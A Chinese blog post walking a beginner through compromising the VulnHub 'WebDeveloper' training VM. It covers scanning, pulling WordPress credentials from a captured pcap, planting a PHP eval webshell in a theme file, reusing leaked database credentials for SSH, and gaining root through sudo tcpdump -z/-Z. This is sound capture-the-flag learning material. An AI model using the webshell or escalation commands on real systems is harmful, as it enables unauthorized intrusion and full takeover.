WebDeveloper内网渗透流程(新手流程梳理)

已于 2023-11-17 16:12:05 修改
阅读量1.2k 收藏 15
点赞数
分类专栏: 学习笔记 文章标签: linux 网络安全
于 2023-03-12 13:00:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30889301/article/details/129473137
版权

WebDeveloper内网渗透流程(新手流程梳理)

目前刚刚学习内网渗透和web的网安知识,先从最入门的离线靶场来理一下一次简要的完整渗透流程。本文内容比较基础,如有错误烦请各位热心大佬纠正。

vulnhub 新手级离线靶场
VMware 15.5
kali镜像:kali-linux-2022.4-installer-amd64
kali ip:192.168.100.83

靶场下载地址: https://download.vulnhub.com/webdeveloper/WebDeveloper.ova

流程目录

下载好靶机之后直接使用VMware软件打开ova,启动即可,将虚拟网络设置为NAT模式或者桥接直连物理网即可
打开后效果如下
在这里插入图片描述
本文章用比较入门的操作来梳理流程

一 信息收集

1.1 nmap

下面先扫描一下这个网段,使用nmap,看一下靶机ip

在这里插入图片描述
对发现的ip进行端口扫描
发现这个211的IP开放了 ssh和http
在这里插入图片描述
在浏览器中尝试访问一下
在这里插入图片描述
确定靶机
下面对web部分开始信息扫描
先来查看这个网站都有哪些可访问页面

1.2 dirsearch

dirsearch扫描windows版

python dirsearch.py -u http://192.168.100.211/

在这里插入图片描述
发现有疑似似登录的页面/wp-login.php
更改url内访问页面,发现登录页面
在这里插入图片描述

1.3 whatweb

为了得到更多信息使用kali中whatweb工具进行扫描查看网站详细信息

whatweb http://192.168.100.211 -v

whatweb扫描发现该网站是WordPress生成的
在这里插入图片描述

1.4 dirb

使用kali的dirb工具扫描,dirb工具可以更全面的扫描出该类型的网站页面和路径

dirb http://192.168.100.211

扫描发现一个叫ipdata的文件,该文件一般用于存放流量文件,可能会有登录信息相关内容
如本图的倒数第三行
在这里插入图片描述

1.5 流量分析——WireShark

更改URL访问该路径发现有一个analyze.cap的流量文件
在这里插入图片描述
下载到本地使用wireshark打开
发现有很多记录
在这里插入图片描述

为了知道登录包的如何传送的,先回到登陆页面随便的登陆一下
此时发现登录时的包是POST请求
在这里插入图片描述
那么就在wireshark中设置过滤规则

http.request.method==POST

既然是POST请求就在这俩包里面翻找一下有没有登陆的信息
发现疑似登录的账号字段“log”和密码字段“pwd”
在这里插入图片描述

使用该字段的值登录一下试试
登陆成功!

在这里插入图片描述

二 文件注入

在这里找到一处疑似可以注入一句话木马的地方

覆盖掉原本内容,尝试进行注入

2.1 一句话木马
<?php @eval($_POST['a']);?>

在这里插入图片描述
上传注入成功
在这里插入图片描述

2.2 蚁剑连接

下面准备使用蚁剑连接
但是先确认一下注入文件的位置
由页面左边可知我们更改的是hello.php
之前dirsearch爆出来的文件里刚好有hello.php的web路径
在这里插入图片描述

确认路径后使用蚁剑连接
连接成功
在这里插入图片描述
在文件中翻找一下配置文件,一般会有一些东西
wp-config.php文件应该就是这个web项目的部分配置文件
在这里插入图片描述

打开发现数据库账户和密码
在这里插入图片描述

2.3 进入内网(ssh)
/** MySQL database username */
define('DB_USER', 'webdeveloper');

/** MySQL database password */
define('DB_PASSWORD', 'MasterOfTheUniverse');

使用ssh登录这个账户进入靶机。

在这里插入图片描述
登陆成功
在这里插入图片描述

三 用户越权

登陆后先查看一下当前用户权限

sudo -l

在这里插入图片描述
发现可以使用tcpdump进行提权
看了太多shell反射提权
本文这里 不采用shell反射 ,咱们用比较简单朴素点的方式

3.1tmp文件夹特性利用

利用tmp的文件特性:
“通常,/tmp 目录的权限会被设置为 1777,这是一个八进制数。这意味着它具有读、写和执行权限,因此属主、属组和其他用户都可以访问它”

现在已知tmp是灰色权限文件夹
进入tmp文件夹下准备提权
在这里插入图片描述

3.2 越权执行

命令思路就是

  1. 先创建一个执行文件
  2. 将要执行的越权命令写入被创建文件
  3. 把被创建文件权限拉满
  4. 通过sudo-tcpdump越权执行文件中的命令
  • tcpdump中有两个关键参数-z和-Z
  • -z 用来执行一个脚本,-Z用来指定tcpdump以哪个用户运行
  • 当可以通过sudo执行时,则可以指定以root用户运行一个脚本,从而达到提权的目的
touch DN                  //在tmp文件夹里创建一个DN(随便按的)
echo "ls /root/" > DN     //把要执行的命令写入DN里面
chmod 777 /tmp/DN         //给DN文件 777 权限
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/DN -Z root
//最后通过sudo-tcpdump执行越权文件

tcpdump命令详解:
-i eth0 从指定网卡捕获数据包
-w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
-z [command] 运行指定的命令
-Z [user] 指定用户执行命令
-G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储
-W [num] 指定抓包数量

通过sudo tcpdump执行越权文件内容“ ls /root/ ”查看了root目录下存在flag.txt

在这里插入图片描述

四 拿下flag

然后更改DN文件越权文件内容

echo "cat /root/flag.txt" > DN

再次执行sudo-tcpdump越权命令得到flag内容
在这里插入图片描述

本文操作仅适用于入门练手,一些步骤可能有些简化,仅供参考和思路梳理

小白江山
关注
专栏目录
AutoSAR系列讲解(入门篇)5.4-ECU的项目流程
雪云飞星的博客
08-28 1万+
主要讲解了AutoSAR开发团队和开发流程
小白的靶机VulnHub-Web Developer
热门推荐
wo41ge的博客
02-02 1万+
靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 开机界面 就是这样 同样是选择桥接 确定靶机的IP地址:192.168.1.10 靶机开放了22和80端口 还是wordpress框架 访问康康呗 dirb直接扫目录 发现目录/ipdata 有一个数据包 用wireshark 打开分析一下 过滤下http的数据包信息 然后就发现了 账号密码 账号:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd
IE浏览器下web调试工具之--IE WebDeveloper介绍
机场信息系统研究员的专栏
09-10 8873
Web项目的架构设计、开发、测试,免不了要熟悉Web页面调试工具,以此来获知哪些浏览器支持Web页面的显示,哪些浏览器下显示有问题。 目前市面上比较火爆的浏览器内核提供商,有微软的IE、mozilla的firefox、谷歌的chrome、苹果的safari。IE浏览器下的项目过去占比非常大,近年随着其他浏览器厂商发展势头迅猛,过去的项目要求在其他浏览器下也能兼容,势必引起一场兼容测试风
wevedeveloper靶机渗透
aarong的博客
12-15 3076
1、 发现目标 (netdiscover),找到WebDeveloper的IP地址。 ​ 2、 利用NMAP扫描目标主机,发现目标主机端口开放、服务情况。 nmap -Pn 192.168.65.1/24 #查看同网段所有主机对应开放端口和服务 从中判断出靶机的IP以及对应的端口和服务情况。 开放了 22端口(SSH远程登录服务)、80端口(HTTP服务) nmap -sV 192.168.65.130 #扫描靶机具体服务信息、服务版本信息 3、 若目标主机提供了HTTP服务,尝试利用浏览器
Web Develop 开源项目教程
最新发布
gitblog_00843的博客
08-23 263
Web Develop 开源项目教程 web-develop项目地址:https://gitcode.com/gh_mirrors/we/web-develop 项目介绍 Web Develop 是一个专注于web开发的开源项目,由SFLAQiu维护。该项目旨在提供一套灵活且高效的前端开发解决方案,涵盖了从基本的页面搭建到复杂的前端架构实现。它集成了最新的前端技术栈,如React/Vue、Web...
Web Developer
我的博客
08-19 1339
最近一直在根据自己的技术栈与习惯思维,理一份Web开发的思维导图;现将导图先放上来,做为博客的开篇。
WEB开发有用工具:web-developer
步行者的专栏
08-20 2309
原来觉得Firebug已经很好用了。最近使用web-developer(http://chrispederick.com/work/web-developer/)这个插件,发现很有用。 Chrome和Firefox浏览器下面只需要安装一个插件就好了。安装非常简单。 web-developer特别是在调试css和画面布局上面非常直观,修改也非常方便。 在测试方面也很有帮助,比如对系统做脆弱
html5开发者工具栏,Web Developer
weixin_42309456的博客
06-10 717
Web Developer Chrome插件官方简介web developer(Chrome开发者工具扩展插件)是一款可以安装在谷歌浏览器上的chrome web developer轻量级开发插件,安装使用web developer插件可以让您的开发变得更加顺畅。Web Developer 这款扩展集成了各种各样的 Web 开发工具,几乎是网页开发人员必备的 Chrome 开发者工具扩展插件,安装...
开发新项目之流程记录
Mr.小灰狼_随笔
09-05 2007
开发新项目之流程记录 由于上一个项目开发告一段落 , 被分配至一个全新的项目组 , 周一简单开完需求会议后 , 确定了一下项目开发时间及项目内的一些需求, 之后的一些流程记录 ,希望对大家有所帮助吧。
最新版苹果开发者账号注册续费流程 Apple Developer
灯灯科技
12-18 1万+
持续了几个月的苹果开发者续费风波仍未过去,无论是采用什么银行的双币双标VISA、MasterCard都无法成功续费,甚至去年续费成功的卡也无法成功。某宝也全面停止了代付业务。 网友给出了各种解决方式,什么地址要怎么填、邮箱要怎么填,其实都没用,只是苹果单方面出了问题(或者故意的),联系苹果客服也无法解决,客服只会告诉你多去尝试。 今天,苹果在Apple Developer...
sfc流程图怎么画_如何使用gxworks2创建简单的顺序功能图sfc
weixin_39845825的博客
12-21 2394
如何使用gxworks2(与gxdeveloper基本通用)创建简单的sfc(顺序功能图)指令。下面以做一个案例来介绍。1打开编程软件gxworks2创建一个新文件,plc选择fx2n(plc类型随意),程序语言选择sfc。最后点击确定。‍‍确定后会出现下图,其中块类型一定要选择梯形图块。然后点击执行.继续执行,如下图2编写初始化指令。在软件右侧输入程序,如图。最后在转换/编译m8002为plc运...
简单介绍Web Developer插件制作网页
01-21
Firefox浏览器是一个良好支持W3C标准的开放源代码的浏览器,拥有Linux/Windows/Mac版本。因为Firefox浏览器良好支持W3C标准,所以使用Firefox来调试网页是非常好的。 Firefox浏览器是一个良好支持W3C标准的开放源代码的浏览器,拥有Linux/Windows/Mac版本。因为Firefox浏览器良好支持W3C标准,所以使用Firefox来调试网页是非常好的。 Firefox默认安装包只有8M(Linux版)和5M(Win版),安装后功能较少。为了能制作网页,我们需要安装Web Developer插件。下面我就介绍一下我使用使用Firefox Web D
Web Developer 2.0.2 简体中文版
11-22
Web Developer 是一款能在浏览器中添加各种Web开发功能的深受欢迎的工具。自 Firefox 57.0 发布以来,以往旧式的扩展已不兼容,因此,Web Developer 的原作者发布了新版本,以支持新的 Web Extension 扩展技术,但火狐官方网站上只提供了英文版的 Web Developer 附加组件,没有中文版的,故本人对原附加组件进行了重新编译,增加了中文界面。 本资源仅对原组件进行重新编译,并增加了中文界面,版权归原作者所有。
Web Developer 1.1.4简体中文版
12-18
太无聊了,下了个Web Developer 1.1.4竟然是繁体中文,看了N别扭就把它汉化成简体中文了,放上来! 是FireFox专用的喔,网页开发人员绝对有用! 已经汉化了1.1.6版本,支持FireFox 3.0喔,需要的同志,赶紧下载!
chrome插件web developer
12-08
chrome插件web developer
webdeveloper(Chrome开发者工具扩展插件)v0.5官方免费版
08-02
web developer(Chrome开发者工具扩展插件)是一款可以安装在谷歌浏览器上的chrome web developer轻量级开发插件,安装使用web developer插件可以让您的开发变得更加顺畅,需要的朋友欢迎前来下载使用! 插件概述: Web Developer 这款扩展集成了各种各样的 Web 开发工具,几乎是网页开发人员必备的 Chrome 开发者工具扩展插件,安装之
vulnhub靶场,WEB DEVELOPER:1——新手进阶2
m0_75051044的博客
01-25 1952
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式,使攻击机和靶机的网络连接一样。然后浏览器访问http://192.168.109.191//wp-content/themes/twentysixteen/404.php。发现数据库的用户名和密码,尝试使用这个用户名和密码进行ssh远程连接(可以重新开启一个终端窗口,方便操作)使用arp-scan -l扫描确定靶机ip,当然也可以用nmap和netdiscover。
vulnhub靶场,WEB DEVELOPER: 1
kukudeshuo的博客
12-21 982
vulnhub靶场,WEB DEVELOPER: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/ 攻击机:kali(192.168.109.128) 靶机:WEB DEVELOPER: 1(192.168.109.191) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取到root权限下的flag 信息收集 使用arp-scan查看确定目标靶机
CTF实践:渗透测试WebDeveloper靶机
"网络渗透实验四 - CTF实践,通过Kali LinuxWebDeveloper靶机进行渗透测试,学习CTF竞赛中的MISC、PPC、WEB等知识,增强信息收集和团队协作能力,掌握网络扫描、目录枚举、提权等技能。" 本实验主要涉及以下知识...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值